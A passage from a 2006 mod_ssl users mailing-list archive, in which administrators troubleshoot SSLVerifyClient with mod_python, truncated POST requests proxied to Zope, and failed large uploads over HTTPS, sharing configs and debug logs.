Basically, any url that contains, but does not begin with '/download/', fal=
sely requires an SSL client cert, and produces an IOError in the python dur=
ing the write() call.


I've tried using "Directory" directive as well as Locatio=
nMatch "^/download/".  Also I've used both 'SetHandler none'=
 and 'SetHandler default-handler'.  I've also tried this on linux 2.6.=
9 as well as mac os x=20
10.4.6.  All of these are equally broken.

Simple test python co=
de is here:

---- dummy.py ----
from mod_python import apache
<=
br>def handler(req):
    req.content_type =3D 'text/plain=
'
    try:
       =
=20
req.write(str(req.the_request))
    except IOError, e:        apache.log_error('IOError: ' + =
str(e))
        apache.log_error('IOE=
rror: ' + req.the_request)
    return apache.OK
------=
--

Below are the errors produced in apache's error log for each url,=
 using a client that does not have the client cert configured.=20


https://foobar.co=
m/download/stuff.txt
[www_error] Re-negotiation handshake failed: No=
t accepted by client!?
[curl error] SSL read: error:14094410:SSL routine=
s:SSL3_READ_BYTES:sslv3 alert handshake failure, errno 0=20


https://foobar.com/setu=
p/things
[no errors]

https://foobar.com/setup/download/stuff
[www_error] IOEr=
ror: Write failed, client closed connection.

[www_error] IOError: GET /foo/download HTTP/1.1
[curl error] SSL rea=
d: error:14094410:SSL routines:SSL3_READ_BYTES:sslv3 alert handshake failur=
e, errno 0 

Has anybody seen any problem like this?  I tried se=
tting this up to fail w/ static content, but so far it only fails w/ mod_py=
thon + ssl.

The apache lists show a few other problems w/ the SSLVerifyClient direc=
tive, so it may not be only mod_python that triggers this... 

 =
 
http://marc.theaimsgroup.com/?l=3Dapache-modssl&w=3D2&r=3D1&s=
=3DSSLVerifyClient&q=3Db

Semantically, it seems odd that the=
 python intrepreter would even be invoked, since the SSLVerifyClient ought =
to be part of the authentication step, and should refuse the request before=
 it even arrives.  In any case, I'm completely befuddled.


ben



------=_Part_1598_24914974.1144425551282--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Apr 11 16:40:15 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 617FF14D854; Tue, 11 Apr 2006 16:40:15 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from xproxy.gmail.com (xproxy.gmail.com [66.249.82.200])
	by master.modssl.org (Postfix) with ESMTP id 305F414D833
	for ; Tue, 11 Apr 2006 16:40:13 +0200 (CEST)
Received: by xproxy.gmail.com with SMTP id s19so817222wxc
        for ; Tue, 11 Apr 2006 07:40:05 -0700 (PDT)
DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws;
        s=beta; d=gmail.com;
        h=received:message-id:date:from:to:subject:mime-version:content-type;
        b=KEtSPDoPgad24BdA7BFhpRw19kaI2nmcYgWmSpMVyunpFhjAQ7lFQpI9C8TEvrw9WqSZn/mHYsI4UrbWv065J1gtLNaiHZQZtE2S/TptItx0Pd8iv6x3f4/UA7+n3nlk+/EnJT9fiHbpy9nuc8SoqKkNwdDRLmBMFxKMXtbZrnY=
Received: by 10.70.45.3 with SMTP id s3mr668298wxs;
        Tue, 11 Apr 2006 07:40:05 -0700 (PDT)
Received: by 10.70.15.20 with HTTP; Tue, 11 Apr 2006 07:40:05 -0700 (PDT)
Message-ID: <81739ca0604110740w18578bb0uab39c2b06d04e4f0@mail.gmail.com>
Date: Tue, 11 Apr 2006 08:40:05 -0600
From: aus129@gmail.com
To: modssl-users@modssl.org
Subject: Eliminating POST Variables
MIME-Version: 1.0
Content-Type: multipart/alternative; 
	boundary="----=_Part_6164_28799990.1144766405381"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: aus129@gmail.com
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

------=_Part_6164_28799990.1144766405381
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable
Content-Disposition: inline

I am running a virtual host in Apache 2.0.55 using mod_ssl + OpenSSL
0.9.8aon Win 2k3 Server.  It seems to truncate POST requests that
exceed a few
kilobytes.

Here is the scenario:  Apache uses a rewrite / proxy rule to forward
requests to Zope:
        RewriteRule /(.*)
http://localhost:8080/VirtualHostBase/https/denproduction.fqdn:443/VirtualH=
ostRoot/$1
[P,L]
When this rule is applied to the Virtual Host on the secure port 443, there
is a limit to the size of the request variables that it will forward to
Zope.  When it is applied to the Apache globally and requests are done over
port 80, any size variables will be passed to Zope.  The large requests are
XML files, so I tried unsetting the LimitXMLRequestBody directive.

Here is my virtual host configuration:



ServerName denproduction.fqdn:443
ServerAdmin wdyk@fqdn
TransferLog logs/access_log

LimitXMLRequestBody 0

SSLEngine on
ServerName denproduction.fqdn

DocumentRoot C:/Apache2/htdocs
ErrorLog logs/ssl_error_log

SSLCipherSuite
ALL:!ADH:!EXPORT56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP:+eNULL

SSLCertificateFile ssl/denproduction.cert
SSLCertificateKeyFile ssl/denproduction.key

SSLOptions +StdEnvVars +CompatEnvVars

SetEnvIf User-Agent ".*MSIE.*" \
         nokeepalive ssl-unclean-shutdown \
         downgrade-1.0 force-response-1.0

CustomLog logs/ssl_request_log \
          "%t %h %{SSL_PROTOCOL}x %{SSL_CIPHER}x \"%r\" %b"

# Rewrite Rules for Zope


  RewriteEngine On
  RewriteLog C:/Apache2/logs/rewrite.log
  RewriteLogLevel 0
  # Default to route everything to Zope
  # If the path starts with /local, then just server Apache's root
  RewriteRule ^/test/ - [L]
  RewriteRule /(.*)
http://localhost:8080/VirtualHostBase/https/denproduction.fqdn:443/VirtualH=
ostRoot/$1
[P,L]




The problem has occurred when I make POST requests from the Python client
that I am writing, as well as when I am managing large python scripts
through the Zope management interface over SSL.

Any pointers are appreciated!

Wes Dyk, Production Systems Analyst
Noble Energy Production, Inc.

------=_Part_6164_28799990.1144766405381
Content-Type: text/html; charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable
Content-Disposition: inline

I am running a virtual host in Apache
2.0.55 using mod_ssl + OpenSSL 0.9.8a on Win 2k3 Server.  It seems
to truncate POST requests that exceed a few kilobytes.



Here is the scenario:  Apache=
 uses
a rewrite / proxy rule to forward requests to Zope: 

        Rewrit=
eRule
/(.*) http://localhost:8080/VirtualHostBase=
/https/denproduction.fqdn:443/VirtualHostRoot/$1
[P,L]

When this rule is applied to the V=
irtual
Host on the secure port 443, there is a limit to the size of the request
variables that it will forward to Zope.  When it is applied to the
Apache globally and requests are done over port 80, any size variables
will be passed to Zope.  The large requests are XML
files, so I tried unsetting the LimitXMLRequestBody directive.  



Here is my virtual host configurat=
ion:



<VirtualHost *:443>



ServerName denproduction.fqdn:443<=
/font>

ServerAdmin wdyk@fqdn

TransferLog logs/access_log



LimitXMLRequestBody 0



SSLEngine on

ServerName denproduction.fqdn



DocumentRoot C:/Apache2/htdocs

ErrorLog logs/ssl_error_log



SSLCipherSuite ALL:!ADH:!EXPORT56:=
RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP:+eNULL



SSLCertificateFile ssl/denproducti=
on.cert

SSLCertificateKeyFile ssl/denprodu=
ction.key



SSLOptions +StdEnvVars +CompatEnvV=
ars



SetEnvIf User-Agent ".*MSIE.*=
"
\

         =
nokeepalive
ssl-unclean-shutdown \

         =
downgrade-1.0
force-response-1.0



CustomLog logs/ssl_request_log \

         =
 "%t
%h %{SSL_PROTOCOL}x %{SSL_CIPHER}x \"%r\" %b"



# Rewrite Rules for Zope



<IfModule mod_rewrite.c>

  RewriteEngine On

  RewriteLog C:/Apache2/logs/=
rewrite.log

  RewriteLogLevel 0

  # Default to route everythi=
ng
to Zope

  # If the path starts with /=
local,
then just server Apache's root

  RewriteRule ^/test/ - [L]

  RewriteRule /(.*) 
http://localhost:8080/VirtualHostBase/https/denproduction.fqdn:443/VirtualH=
ostRoot/$1
[P,L]

</IfModule>



</VirtualHost>



The problem has occurred when I ma=
ke
POST requests from the Python client that I am writing, as well as when
I am managing large python scripts through the Zope management interface
over SSL.



Any pointers are appreciated!



Wes Dyk, Production Systems Analyst

Noble Energy Production, Inc.

------=_Part_6164_28799990.1144766405381--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Apr 18 11:57:20 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 70E2914D85E; Tue, 18 Apr 2006 11:57:20 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from xproxy.gmail.com (xproxy.gmail.com [66.249.82.201])
	by master.modssl.org (Postfix) with ESMTP id 63FF714D833
	for ; Tue, 18 Apr 2006 11:57:18 +0200 (CEST)
Received: by xproxy.gmail.com with SMTP id s19so482664wxc
        for ; Tue, 18 Apr 2006 02:57:17 -0700 (PDT)
DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws;
        s=beta; d=gmail.com;
        h=received:message-id:date:from:to:subject:mime-version:content-type:content-transfer-encoding:content-disposition;
        b=ikpMQvUxjXw94NJV9ufaklVk7g7kvUYlD87QDy0Ajje3VdKPN2sjeparAFqRkYAyI1Xi1rZOHORuawHmh6Q6xAlJeA9zOR7yOq+fQYtVbi9iGPxDySB60SpClCuJ/wTtesh5FnBVxswJ5XLd7k3R0cQWuPt5WyVh50XArsza0H0=
Received: by 10.70.35.17 with SMTP id i17mr1934536wxi;
        Tue, 18 Apr 2006 02:57:17 -0700 (PDT)
Received: by 10.70.13.13 with HTTP; Tue, 18 Apr 2006 02:57:17 -0700 (PDT)
Message-ID: 
Date: Tue, 18 Apr 2006 17:57:17 +0800
From: "Ken Chen" 
To: modssl-users@modssl.org
Subject: Failed uploading file to Appache HTTP Server after using SSL
MIME-Version: 1.0
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable
Content-Disposition: inline
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Ken Chen" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi all,


I have setup a SunOne App server in linux and Apache HTTP Server  with
Open SSL for users to access it.

When access the application and try to upload a file in one
functionality module of the application, some problems encountered:

1.  If users access our server via https://.... through the web
server, it fails to upload.  Backend source encountered
NullPointerException when accessing the FileItem requested.

2.  But if users access our server via http://... through the web
server, there is no that problem.


Hence I think there should be something wrong with the request parsing
 through https.

Any advice/clue to check where or how to solve it is greatly
appreciated.   Thanks in advance.

Apache ver:
Server version: Apache/2.0.55
Server built:   Apr  6 2006 11:33:34


--
--------------------------------------------------
Ken Chen
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Apr 18 16:49:24 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 5F44E14D85E; Tue, 18 Apr 2006 16:49:24 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from nproxy.gmail.com (nproxy.gmail.com [64.233.182.186])
	by master.modssl.org (Postfix) with ESMTP id 373E814D833
	for ; Tue, 18 Apr 2006 16:49:23 +0200 (CEST)
Received: by nproxy.gmail.com with SMTP id y25so652862nfb
        for ; Tue, 18 Apr 2006 07:49:22 -0700 (PDT)
DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws;
        s=beta; d=gmail.com;
        h=received:message-id:date:from:sender:to:subject:in-reply-to:mime-version:content-type:references;
        b=Cf7s72vNw9S+LsAOIN2HpckAUjr5PhaoOaheEfEmU0JV4kQy20zzufBlXj1dEa+l9LlJ2+NPPsaqN0X/8bqW+5QjToTFsVDS+1NYsQqi9VEErhLJVnaoogc38YTqEsaaAh5ZNzJE8SbhuGCATjP2KXM3H9FRMGcvVFIv7NO+hgI=
Received: by 10.49.36.2 with SMTP id o2mr1695056nfj;
        Tue, 18 Apr 2006 07:49:22 -0700 (PDT)
Received: by 10.49.29.14 with HTTP; Tue, 18 Apr 2006 07:49:22 -0700 (PDT)
Message-ID: 
Date: Tue, 18 Apr 2006 10:49:22 -0400
From: "Cliff Woolley" 
To: modssl-users@modssl.org, chengusky@gmail.com
Subject: Re: Failed uploading file to Appache HTTP Server after using SSL
In-Reply-To: 
MIME-Version: 1.0
Content-Type: multipart/alternative; 
	boundary="----=_Part_1053_27798647.1145371762498"
References: 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Cliff Woolley" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

------=_Part_1053_27798647.1145371762498
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable
Content-Disposition: inline

On 4/18/06, Ken Chen  wrote:
>
> 1.  If users access our server via https://.... through the web
> server, it fails to upload.  Backend source encountered
> NullPointerException when accessing the FileItem requested.
> 2.  But if users access our server via http://... through the web
> server, there is no that problem.
> Hence I think there should be something wrong with the request parsing
> through https.
> Any advice/clue to check where or how to solve it is greatly
> appreciated.   Thanks in advance.


A couple of suggestions: (1) turn on debug logging in mod_ssl... this will
give you a byte-by-byte dump of the SSL transaction in the log file.  (2)
try connecting to your https server with "openssl s_client" and then issuin=
g
a GET request by hand.  That can often be instructive.

--Cliff

------=_Part_1053_27798647.1145371762498
Content-Type: text/html; charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable
Content-Disposition: inline

On 4/18/06, Ken Chen <chengusky@gmail.com> wrote:

1.  If users access our server via https://.... through the webserver, it fails to upload.  Backend source encountered
Null=
PointerException when accessing the FileItem requested.
2.  Bu=
t if users access our server via http://... through the web

server, there is no that problem.
Hence I think there should be some=
thing wrong with the request parsing
 through https.
Any advice/clue =
to check where or how to solve it is greatly
appreciated.   Th=
anks in advance.


A couple of suggestions: (1) turn on debug logging in=
 mod_ssl... this will give you a byte-by-byte dump of the SSL transaction i=
n the log file.  (2) try connecting to your https server with "op=
enssl s_client" and then issuing a GET request by hand.  That can=
 often be instructive.


--Cliff


------=_Part_1053_27798647.1145371762498--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Apr 19 10:23:28 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 6020914D866; Wed, 19 Apr 2006 10:23:28 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from xproxy.gmail.com (xproxy.gmail.com [66.249.82.192])
	by master.modssl.org (Postfix) with ESMTP id DD8A314D82E
	for ; Wed, 19 Apr 2006 10:23:27 +0200 (CEST)
Received: by xproxy.gmail.com with SMTP id s19so664731wxc
        for ; Wed, 19 Apr 2006 01:23:26 -0700 (PDT)
DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws;
        s=beta; d=gmail.com;
        h=received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:content-transfer-encoding:content-disposition:references;
        b=HVxod8SXkmsSD7nF5ZIsEX0zYQK4Q87Z0t9cM64Wz/tL7Fmn32bQu+vES2AtaQdNAg/sR4aRv0gGQfKL33/WmWatZny3TLMYbQcWYx1+LlvqEH4YhWGkuHA2l9pQ94dR8YqB0G6WQ2B5oYHtX3AwpApZtJ42VAIHKFdUGvYAqwY=
Received: by 10.70.133.2 with SMTP id g2mr1783672wxd;
        Wed, 19 Apr 2006 01:23:26 -0700 (PDT)
Received: by 10.70.13.13 with HTTP; Wed, 19 Apr 2006 01:23:26 -0700 (PDT)
Message-ID: 
Date: Wed, 19 Apr 2006 16:23:26 +0800
From: "Ken Chen" 
To: modssl-users@modssl.org
Subject: Re: Failed uploading file to Appache HTTP Server after using SSL
In-Reply-To: 
MIME-Version: 1.0
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable
Content-Disposition: inline
References: 
	 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Ken Chen" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi Cliff,

Thanks for your advice.

Now seems when uploading big file has problem in ssl.  When I upload a
3K image file, it's ok.  But when I upload a 35K image file.  It
failed.

Is there any place to set the cache/buffer?  Or I have to set
SSLSessionCache and SSLSessionCacheTimeout?

By the way, I don't understand why to use openssl s_client and issue a
GET request?  I am uploading file.  Isn't it a POST request?  Can you
have a brief sample how to test?

Thanks in advance.

Ken


On 4/18/06, Cliff Woolley  wrote:
> On 4/18/06, Ken Chen  wrote:
>
> > 1.  If users access our server via https://.... through the web
> > server, it fails to upload.  Backend source encountered
> > NullPointerException when accessing the FileItem requested.
> > 2.  But if users access our server via http://... through the web
> > server, there is no that problem.
> > Hence I think there should be something wrong with the request parsing
> > through https.
> > Any advice/clue to check where or how to solve it is greatly
> > appreciated.   Thanks in advance.
>
>
> A couple of suggestions: (1) turn on debug logging in mod_ssl... this wil=
l
> give you a byte-by-byte dump of the SSL transaction in the log file.  (2)
> try connecting to your https server with "openssl s_client" and then issu=
ing
> a GET request by hand.  That can often be instructive.
>
> --Cliff


--
--------------------------------------------------
Ken Chen
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Apr 19 15:05:49 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id D0EDD14D85B; Wed, 19 Apr 2006 15:05:49 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from nproxy.gmail.com (nproxy.gmail.com [64.233.182.184])
	by master.modssl.org (Postfix) with ESMTP id 9750C14D82E
	for ; Wed, 19 Apr 2006 15:05:46 +0200 (CEST)
Received: by nproxy.gmail.com with SMTP id y25so831638nfb
        for ; Wed, 19 Apr 2006 06:05:46 -0700 (PDT)
DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws;
        s=beta; d=gmail.com;
        h=received:message-id:date:from:sender:to:subject:in-reply-to:mime-version:content-type:references;
        b=GQ2ZdGnpx54wXyS3Ugma+pWyF8y4AFniG7NcbRAkFf3pP9kJCv5T2qIg+QjTyZOFwD1jUwJh+yRGFeRicCH5ju9LD+eeB/Rab6yK2BwRXwTuIc3Uu51Da4s4CNpVvWuF15j0H2TccH+yJ+lmdbLRkcazE27XVXda+3tsyIIYDTE=
Received: by 10.49.64.6 with SMTP id r6mr1310471nfk;
        Wed, 19 Apr 2006 06:05:46 -0700 (PDT)
Received: by 10.49.29.14 with HTTP; Wed, 19 Apr 2006 06:05:45 -0700 (PDT)
Message-ID: 
Date: Wed, 19 Apr 2006 09:05:45 -0400
From: "Cliff Woolley" 
To: modssl-users@modssl.org
Subject: Re: Failed uploading file to Appache HTTP Server after using SSL
In-Reply-To: 
MIME-Version: 1.0
Content-Type: multipart/alternative; 
	boundary="----=_Part_4826_9028194.1145451945998"
References: 
	 
	 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Cliff Woolley" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

------=_Part_4826_9028194.1145451945998
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable
Content-Disposition: inline

On 4/19/06, Ken Chen  wrote:
>
> Now seems when uploading big file has problem in ssl.  When I upload a
> 3K image file, it's ok.  But when I upload a 35K image file.  It
> failed.


Ah, I see.


Is there any place to set the cache/buffer?  Or I have to set
> SSLSessionCache and SSLSessionCacheTimeout?


You should set the session cache anyway (failing to do so will result in a
major drop in performance), but this should have no effect on the particula=
r
problem you're describing.


> By the way, I don't understand why to use openssl s_client and issue a
> GET request?  I am uploading file.  Isn't it a POST request?  Can you
> have a brief sample how to test?


It was unclear to me from your original message that *any* https was
working, so I was trying to just give you the most basic test to try.  I
didn't realize you could upload small files successfully.

Did you turn on the ssl debug log and look at the spot in the large file
upload where it failed?

--Cliff

------=_Part_4826_9028194.1145451945998
Content-Type: text/html; charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable
Content-Disposition: inline

On 4/19/06, Ken Chen <chengusky@gmail.com> wrote:

Now seems when uploading big file has problem in ssl.  When I upl=
oad a
3K image file, it's ok.  But when I upload a 35K image f=
ile.  It
failed.

Ah, I see.

=


Is there any place to set the cache/buffer?  Or I have to set
=
SSLSessionCache and SSLSessionCacheTimeout?

You should=
 set the session cache anyway (failing to do so will result in a major drop=
 in performance), but this should have no effect on the particular problem =
you're describing.

 
B=
y the way, I don't understand why to use openssl s_client and issue a
GE=
T request?  I am uploading file.  Isn't it a POST reque=
st?  Can you

have a brief sample how to test?

It was unclear to=
 me from your original message that *any* https was working, so I was tryin=
g to just give you the most basic test to try.  I didn't realize you c=
ould upload small files successfully.


Did you turn on the ssl debug log and look at the spot in the large=
 file upload where it failed?

--Cliff


------=_Part_4826_9028194.1145451945998--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Apr 20 11:04:11 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 7572D14D892; Thu, 20 Apr 2006 11:04:10 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from xproxy.gmail.com (xproxy.gmail.com [66.249.82.206])
	by master.modssl.org (Postfix) with ESMTP id E1CA114D88D
	for ; Thu, 20 Apr 2006 11:04:09 +0200 (CEST)
Received: by xproxy.gmail.com with SMTP id s19so62201wxc
        for ; Thu, 20 Apr 2006 02:04:08 -0700 (PDT)
DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws;
        s=beta; d=gmail.com;
        h=received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:content-transfer-encoding:content-disposition:references;
        b=Zo4x3BYrWOucwSFasQIjNAlIKkTK8ULjzvNVrReX0jXXJjtsS7HtscFqzz7vND8RGxlc7xwM+OolHbiP9nYvO+2z/imqFWdQBbNcQDRfMn2+AnSytrJWo0NiSO3LQksCAu8OcCfk5Xm4Ufak1DENipUjz/ac/JehlS9ARIyBppk=
Received: by 10.70.30.3 with SMTP id d3mr537446wxd;
        Thu, 20 Apr 2006 02:04:08 -0700 (PDT)
Received: by 10.70.13.13 with HTTP; Thu, 20 Apr 2006 02:04:08 -0700 (PDT)
Message-ID: 
Date: Thu, 20 Apr 2006 17:04:08 +0800
From: "Ken Chen" 
To: modssl-users@modssl.org
Subject: Re: Failed uploading file to Appache HTTP Server after using SSL
In-Reply-To: 
MIME-Version: 1.0
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable
Content-Disposition: inline
References: 
	 
	 
	 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Ken Chen" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi, Cliff,

The below is the error in ssl-error_log when I am trying to save a large im=
age:
[Thu Apr 20 16:55:36 2006] [debug] ssl_engine_io.c(1523): OpenSSL: I/O
error, 5 bytes expected to read on BIO#81f94a8 [mem: 81f9640]
[Thu Apr 20 16:55:36 2006] [info] (70007)The timeout specified has
expired: SSL input filter read failed.
[Thu Apr 20 16:55:36 2006] [debug] ssl_engine_kernel.c(1794): OpenSSL:
Write: SSL negotiation finished successfully
[Thu Apr 20 16:55:36 2006] [info] Connection to child 4 closed with
standard shutdown(server 192.168.2.130:443, client 192.168.2.199)
[Thu Apr 20 16:55:36 2006] [debug] ssl_engine_io.c(1523): OpenSSL: I/O
error, 5 bytes expected to read on BIO#81df970 [mem: 81eaf30]
[Thu Apr 20 16:55:36 2006] [info] (70007)The timeout specified has
expired: SSL input filter read failed.
[Thu Apr 20 16:55:36 2006] [debug] ssl_engine_kernel.c(1794): OpenSSL:
Write: SSL negotiation finished successfully
[Thu Apr 20 16:55:36 2006] [info] Connection to child 7 closed with
standard shutdown(server 192.168.2.130:443, client 192.168.2.199)

Ken


On 4/19/06, Cliff Woolley  wrote:
> On 4/19/06, Ken Chen  wrote:
>
> > Now seems when uploading big file has problem in ssl.  When I upload a
> > 3K image file, it's ok.  But when I upload a 35K image file.  It
> > failed.
>
>
> Ah, I see.
>
>
> > Is there any place to set the cache/buffer?  Or I have to set
> > SSLSessionCache and SSLSessionCacheTimeout?
>
>
> You should set the session cache anyway (failing to do so will result in =
a
> major drop in performance), but this should have no effect on the particu=
lar
> problem you're describing.
>
> > By the way, I don't understand why to use openssl s_client and issue a
> > GET request?  I am uploading file.  Isn't it a POST request?  Can you
> > have a brief sample how to test?
>
>
> It was unclear to me from your original message that *any* https was
> working, so I was trying to just give you the most basic test to try.  I
> didn't realize you could upload small files successfully.
>
> Did you turn on the ssl debug log and look at the spot in the large file
> upload where it failed?
>
> --Cliff
>


--
--------------------------------------------------
Ken Chen
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Apr 20 11:13:57 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 615F514D890; Thu, 20 Apr 2006 11:13:57 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from xproxy.gmail.com (xproxy.gmail.com [66.249.82.204])
	by master.modssl.org (Postfix) with ESMTP id B21A814D835
	for ; Thu, 20 Apr 2006 11:13:55 +0200 (CEST)
Received: by xproxy.gmail.com with SMTP id s19so63311wxc
        for ; Thu, 20 Apr 2006 02:13:55 -0700 (PDT)
DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws;
        s=beta; d=gmail.com;
        h=received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:content-transfer-encoding:content-disposition:references;
        b=hlHVjtuupYKaR2Ax7pVkPBzkFFp3HqYLe2QVNZozNLO9vuOFypcdGjdyp5POQcM64KMBsCUrmeE1CiHicHMdNr1+qrxPdJYDKMgIju/55ZyHCWcvmcQRC9n7DMm/pSsZsyfcKmDf2pgfgRTKmLKcJnMWREBCyPcym1fD4JIbpyY=
Received: by 10.70.44.17 with SMTP id r17mr554738wxr;
        Thu, 20 Apr 2006 02:13:55 -0700 (PDT)
Received: by 10.70.13.13 with HTTP; Thu, 20 Apr 2006 02:13:54 -0700 (PDT)
Message-ID: 
Date: Thu, 20 Apr 2006 17:13:54 +0800
From: "Ken Chen" 
To: modssl-users@modssl.org
Subject: Re: Failed uploading file to Appache HTTP Server after using SSL
In-Reply-To: 
MIME-Version: 1.0
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable
Content-Disposition: inline
References: 
	 
	 
	 
	 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Ken Chen" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

part of the log when I try to upload 2nd time:
[Thu Apr 20 17:04:31 2006] [debug] ssl_engine_io.c(1512): OpenSSL:
read 335/335 bytes from BIO#81d53d8 [mem: 81eeefd] (BIO dump follows)
[Thu Apr 20 17:04:31 2006] [debug] ssl_engine_io.c(1459):
+-------------------------------------------------------------------------+
[Thu Apr 20 17:04:31 2006] [debug] ssl_engine_io.c(1484): | 0000: f9
9e 30 db e4 11 38 bd-41 8a 99 e8 f1 24 18 31  ..0...8.A....$.1 |
[Thu Apr 20 17:04:31 2006] [debug] ssl_engine_io.c(1484): | 0010: 18
99 3b a2 03 26 23 e3-c1 a1 d3 73 22 09 63 e8  ..;..&#....s".c. |
[Thu Apr 20 17:04:31 2006] [debug] ssl_engine_io.c(1484): | 0020: 91
1f f2 48 1b 80 a6 fd-45 5d 11 27 ce 42 ac 74  ...H....E].'.B.t |
[Thu Apr 20 17:04:31 2006] [debug] ssl_engine_io.c(1484): | 0030: dc
29 9c 4e 9a 23 02 cb-d4 1e 5a 72 ab 6c d9 df  .).N.#....Zr.l.. |
[Thu Apr 20 17:04:31 2006] [debug] ssl_engine_io.c(1484): | 0040: 9e
f8 34 45 cb 31 30 47-8a 50 a3 a3 38 e7 2b b8  ..4E.10G.P..8.+. |
[Thu Apr 20 17:04:31 2006] [debug] ssl_engine_io.c(1484): | 0050: 6b
56 dd ee 82 3c 21 01-49 9e e9 e0 fd 82 48 34  kV...7'.O..... |
[Thu Apr 20 17:04:31 2006] [debug] ssl_engine_io.c(1484): | 00a0: c2
af b7 1a b1 9a e1 bb-a3 0c 61 3f 05 57 53 17  ..........a?.WS. |
[Thu Apr 20 17:04:31 2006] [debug] ssl_engine_io.c(1484): | 00b0: 2c
b6 f2 32 5f c1 8b 35-32 7d d1 bf dd 49 9c 4a  ,..2_..52}...I.J |
